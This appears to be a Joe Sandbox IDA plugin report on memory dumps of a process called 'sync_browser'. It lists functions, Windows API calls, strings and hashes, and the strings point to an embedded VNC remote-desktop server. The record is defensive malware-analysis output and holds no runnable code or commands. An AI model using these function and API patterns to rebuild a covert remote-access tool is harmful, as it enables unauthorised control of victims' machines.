Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
String ID:
API String ID: 2697342021-0
Opcode ID: de0f7d0db838a6694e556728dce1da0ed6ac73d480ac1435a241c305d3221d84
Instruction ID: 4cbc24f10582338b4cbdcc21d0151a891ead63c0e689638640a13d02861abbfa
Opcode Fuzzy Hash: de0f7d0db838a6694e556728dce1da0ed6ac73d480ac1435a241c305d3221d84
Instruction Fuzzy Hash: 09813B26A0DA81D5EB10FB7094543AD6364EF84BA8F840239DE6D4B7EDCF38E549C324

Function 00007FF7400C8A7C Relevance: 16.6, APIs: 11, Instructions: 83COMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32 ref: 00007FF7400C8ABB
GetLastError.KERNEL32 ref: 00007FF7400C8AC5
_errno.LIBCMT ref: 00007FF7400C8AEB
calloc.LIBCMT ref: 00007FF7400C8B00
_errno.LIBCMT ref: 00007FF7400C8B0D
_errno.LIBCMT ref: 00007FF7400C8B1F
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C8B2A
GetFullPathNameA.KERNEL32 ref: 00007FF7400C8B41
free.LIBCMT ref: 00007FF7400C8B56
_errno.LIBCMT ref: 00007FF7400C8B5B
free.LIBCMT ref: 00007FF7400C8B7B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
String ID:
API String ID: 3219262609-0
Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
Instruction ID: 3ea0cbae6243fd1196b61b2aebdd76745f57c084bc9a8b8ee9de1f79f8ba0a19
Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
Instruction Fuzzy Hash: 12317E60E0C652C5FA697A616404379E2A0AF45BD0F984532EE5E47BFEDF2CF8408329

Function 00007FF74002D930 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF74002D95E

Part of subcall function 00007FF7400979A0: EnterCriticalSection.KERNEL32 ref: 00007FF7400979C7
Part of subcall function 00007FF7400979A0: LeaveCriticalSection.KERNEL32 ref: 00007FF7400979E9
Part of subcall function 00007FF7400979A0: CreateSemaphoreA.KERNEL32 ref: 00007FF740097A03
Part of subcall function 00007FF7400979A0: GetLastError.KERNEL32 ref: 00007FF740097A15

Part of subcall function 00007FF74000D9D0: OpenFileMappingA.KERNEL32 ref: 00007FF74000DA07
Part of subcall function 00007FF74000D9D0: MapViewOfFile.KERNEL32 ref: 00007FF74000DA2D

InitializeCriticalSection.KERNEL32 ref: 00007FF74002D9EB

Part of subcall function 00007FF740004680: InitializeCriticalSection.KERNEL32 ref: 00007FF7400046A0
Part of subcall function 00007FF740004680: GetModuleHandleA.KERNEL32 ref: 00007FF7400046C5
Part of subcall function 00007FF740004680: GetProcAddress.KERNEL32 ref: 00007FF7400046DA
Part of subcall function 00007FF740004680: GetModuleHandleA.KERNEL32 ref: 00007FF7400046F2
Part of subcall function 00007FF740004680: GetProcAddress.KERNEL32 ref: 00007FF740004707
Part of subcall function 00007FF740004680: GetTickCount.KERNEL32 ref: 00007FF74000475E

LoadLibraryA.KERNEL32 ref: 00007FF74002DA0D
GetProcAddress.KERNEL32 ref: 00007FF74002DA30
LoadLibraryA.KERNEL32 ref: 00007FF74002DA51
GetProcAddress.KERNEL32 ref: 00007FF74002DA6D

Strings

GetCursorInfo, xrefs: 00007FF74002DA26
ChangeWindowMessageFilter, xrefs: 00007FF74002DA63
user32.dll, xrefs: 00007FF74002DA06, 00007FF74002DA4A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
API String ID: 173432231-678763868
Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction ID: db9dad18ec53ad26e251d05ee509b17a1617c4b7f5902511d089a934c8280203
Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction Fuzzy Hash: 5C411C3261DB81E6E648BB20F9402E8B3A8FB44754F904136D6AD037A4DFBCB4B5C720

Function 00007FF740006A20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF740006A65
RegQueryValueExA.ADVAPI32 ref: 00007FF740006AA1
RegCloseKey.ADVAPI32 ref: 00007FF740006B6A

Strings

LANSECNT, xrefs: 00007FF740006AC8, 00007FF740006B22
SERVERNT, xrefs: 00007FF740006B01
LANMANNT, xrefs: 00007FF740006AAF
WinNT, xrefs: 00007FF740006B4A
ProductType, xrefs: 00007FF740006A7D
System\CurrentControlSet\Control\ProductOptions, xrefs: 00007FF740006A49

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 3677997916-356703426
Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
Instruction ID: fc10de241883f9025e796b662f7a665ce931b1a050e7f65537aa3267d882a7c0
Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
Instruction Fuzzy Hash: 96413C72A1C643C1EB60BB20F4543AAB3A1FB44788F841031EA4D9677DEF2CE555CB60

Function 00007FF740033170 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 48threadsynchronizationwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageA.USER32 ref: 00007FF7400331B6
WaitForSingleObject.KERNEL32 ref: 00007FF7400331C8
TerminateThread.KERNEL32 ref: 00007FF7400331F3
CloseHandle.KERNEL32 ref: 00007FF740033200
CloseHandle.KERNEL32 ref: 00007FF740033230

Strings

vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF7400331DE
vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF740033246
vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF74003319A
vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF74003321D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
API String ID: 803186428-2751095142
Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
Instruction ID: a538637e634a2be87b2e406385313b9946e67cea8b2e36edb677195c7705754c
Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
Instruction Fuzzy Hash: AB21386291C586C2E311BB65E4546FA6369FF88B04FC80432CA0E6A379CF7CB545C770

Function 00007FF7400C59D8 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5A72
malloc.LIBCMT ref: 00007FF7400C5ADB
MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5B0F
LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5B36
LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5B7E
malloc.LIBCMT ref: 00007FF7400C5BDB

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5C10
WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7400C5D15), ref: 00007FF7400C5C50
free.LIBCMT ref: 00007FF7400C5C64
free.LIBCMT ref: 00007FF7400C5C75

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
String ID:
API String ID: 1080698880-0
Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
Instruction ID: 6060d9c2ffee275dc841ef004eaddcbb1859adb30fcef511dd8f7515ea351137
Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
Instruction Fuzzy Hash: D781C736B0C742C6EB28BF669480169B691FF48BA5F944235EA5D437E8DF3CF5418720

Function 00007FF740026CAA Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 256COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
LeaveCriticalSection.KERNEL32 ref: 00007FF740027BAC

Part of subcall function 00007FF74002B510: GetTickCount.KERNEL32 ref: 00007FF74002B58C
Part of subcall function 00007FF74002B510: SetEndOfFile.KERNEL32 ref: 00007FF74002B5BC
Part of subcall function 00007FF74002B510: FlushFileBuffers.KERNEL32 ref: 00007FF74002B5C9
Part of subcall function 00007FF74002B510: SystemTimeToFileTime.KERNEL32 ref: 00007FF74002B645
Part of subcall function 00007FF74002B510: SetFileTime.KERNEL32 ref: 00007FF74002B65E
Part of subcall function 00007FF74002B510: CloseHandle.KERNEL32 ref: 00007FF74002B671
Part of subcall function 00007FF74002B510: DeleteFileA.KERNEL32 ref: 00007FF74002B6C2

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 744660428-3977938048
Opcode ID: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
Instruction ID: 83c8e323c194642eae33619538281bcbeac6bcc1fe43bc0ab9efe544e39966cd
Opcode Fuzzy Hash: fed645862cd38dbadc558167132c5494320c5b0844e94726f2647533ca8cab21
Instruction Fuzzy Hash: 58D17F22A0C6D1C5E751BB35C4487EDABA1EB85B88F994139CA4C0B7B9CF79E845C720

Function 00007FF7400269D5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 224COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
GetTickCount.KERNEL32 ref: 00007FF7400241B3

Part of subcall function 00007FF74002C4E0: timeGetTime.WINMM ref: 00007FF74002C52A
Part of subcall function 00007FF74002C4E0: EnterCriticalSection.KERNEL32 ref: 00007FF74002C551
Part of subcall function 00007FF74002C4E0: RevertToSelf.ADVAPI32 ref: 00007FF74002C56C
Part of subcall function 00007FF74002C4E0: LeaveCriticalSection.KERNEL32 ref: 00007FF74002C57C

LeaveCriticalSection.KERNEL32 ref: 00007FF740027BAC

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2523754900-3977938048
Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
Instruction ID: cd43859bf3b9b465c6c995e31249f31938a5c95bdc686740604c4cd24c8d41f3
Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
Instruction Fuzzy Hash: 25B1CF22A0C691C5E750FB25C4587FEABA1EB85B84F994039DA4C477B9CF38F845C720

Function 00007FF740026C6A Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 213COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
LeaveCriticalSection.KERNEL32 ref: 00007FF740027BAC

Part of subcall function 00007FF74002B510: GetTickCount.KERNEL32 ref: 00007FF74002B58C
Part of subcall function 00007FF74002B510: SetEndOfFile.KERNEL32 ref: 00007FF74002B5BC
Part of subcall function 00007FF74002B510: FlushFileBuffers.KERNEL32 ref: 00007FF74002B5C9
Part of subcall function 00007FF74002B510: SystemTimeToFileTime.KERNEL32 ref: 00007FF74002B645
Part of subcall function 00007FF74002B510: SetFileTime.KERNEL32 ref: 00007FF74002B65E
Part of subcall function 00007FF74002B510: CloseHandle.KERNEL32 ref: 00007FF74002B671
Part of subcall function 00007FF74002B510: DeleteFileA.KERNEL32 ref: 00007FF74002B6C2

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 744660428-3977938048
Opcode ID: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
Instruction ID: 9d5fc086b135b1673e3a02a6c5b3a4b939cbfc16935846d6f6eadb4db32d84e3
Opcode Fuzzy Hash: f694d75a88e5963e6137a3996feb78d47f16a8ecee7cd7818c657bba8c0c73e0
Instruction Fuzzy Hash: E9B1BF22A0C691C5E751BB35C4587FEABA1EB85B84F994039DA4C477B9CF39F844C720

Function 00007FF740035AE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00007FF740035B63
GetWindowRect.USER32 ref: 00007FF740035BA3
CreateRectRgn.GDI32 ref: 00007FF740035C46
CombineRgn.GDI32 ref: 00007FF740035C5F
DeleteObject.GDI32 ref: 00007FF740035C68
free.LIBCMT ref: 00007FF740035C71

Strings

ConsoleWindowClass, xrefs: 00007FF740035B87
tty, xrefs: 00007FF740035B72

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
String ID: ConsoleWindowClass$tty
API String ID: 490048385-1921057836
Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
Instruction ID: fae68a484c02576e1b89e05d312a94c1875bbd426d9915c64e01c5972952759b
Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
Instruction Fuzzy Hash: 26415E36708785CADB24AB26E580669B7A0FB88B84F844035DF8E53B68DF3CF445CB10

Function 00007FF740019630 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION ref: 00007FF740019655
GetLastError.KERNEL32 ref: 00007FF74001965D

Strings

\StringFileInfo\040904b0\ProductVersion, xrefs: 00007FF7400196B3
Fail: Using 32bit winvnc.exe with a 64bit driver? , xrefs: 00007FF740019667
\StringFileInfo\000004b0\ProductVersion, xrefs: 00007FF7400196D1

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
